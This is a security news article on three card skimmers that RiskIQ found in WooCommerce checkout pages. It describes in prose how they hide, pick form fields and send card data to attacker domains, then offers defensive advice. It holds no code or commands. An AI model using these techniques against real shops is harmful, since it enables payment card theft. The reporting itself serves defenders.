Web administrators overseeing retail sites using the WooCommerce platform should watch for new payment card skimmers that hackers are embedding in checkout pages.
The warning comes from security firm RiskIQ, which this week said it has found three new skimmers targeting e-retailers using the WooCommerce plugin for WordPress. It cited research by Barn2, a software company specializing in WordPress and WooCommerce products, saying WooCommerce represents 29 per cent of the top one million sites using e-commerce technologies, exceeding 5 million active installs of the free plugin as of early 2021.
RiskIQ describes the three new pieces of malicious code as
—The WooTheme Skimmer
This was detected across five domains using a compromised WooCommerce theme. It’s “relatively simplistic and makes its functionality reasonably easy to understand.”
Operators obfuscated the skimming code in all discovered iterations, except one. However, this one instance appears to be in error, as RiskIQ detected the obfuscated skimmer on the same compromised domain before the clear text version appeared.
A separate researcher discovered this same skimmer in July, highlighting similar findings of an exfil domain within the theme’s function.php and the identical destination within the query.slim.js file.
—The Slect Skimmer
Generic skimmers are repeatedly used across the same infrastructure, even by different threat actors, who add unique elements to the skimmer for their specific needs. For RiskIQ a minor change in a skimmer made it describe this one is new. In this case it’s a spelling error of the word “select” in the script. It’s also why researchers call it the ‘Slect’ skimmer.
Once the DOM content is fully loaded, the Slect skimmer does two things. It will look for a series of form fields that the skimmer does not want to pull data from, such as open text fields, passwords, and checkboxes. Next, an event listener listens for a click on a button, likely to evade sandboxing by security researchers.
The exfil domain found within the skimmer has been previously associated with other Magecart infrastructure and identified by RiskIQ research Jordan Herman as being used by a variant of the Grelos skimmer.
–The Gateway Skimmer
RiskIQ says this one has added multiple layers and steps by the actor to hide and obfuscate processes. The skimmer code is “massive and difficult to digest while obfuscated and runs a few unique functions observed in other skimmers.” Throughout different iterations of this skimmer, the word “gate” and “gateway” in .php and .js files, hence its name.
After peeling back the obfuscation throughout the legitimate code in this skimmer, RiskIQ researchers found a skimmer that it has been detecting since 2019. This skimmer even exfiltrates PII and credit card data to the same c2 domain as this familiar skimmer. “Interestingly,” the report adds, “this WooCommerce version of the Gateway skimmer looks specifically for a Firebug web browser extension (long since discontinued in 2017).”
As for how the sites were compromised, RiskIQ told ITWorldCanada.com it believes that weaknesses exist in the compromised clients’ use of poorly-vetted WooCommerce themes and unaudited third-party code. “This is explicitly true in the WooTheme skimmer, as we can see that the card skimmer is embedded into a malicious theme file, and the Slect and Gateway skimmers are both obfuscated and pasted into legitimate checkout javascript.”
Beyond having robust detections for malware, website operations should regularly inspect their crontab commands for strange contents, ensure that access permissions are correct, and audit file access to it.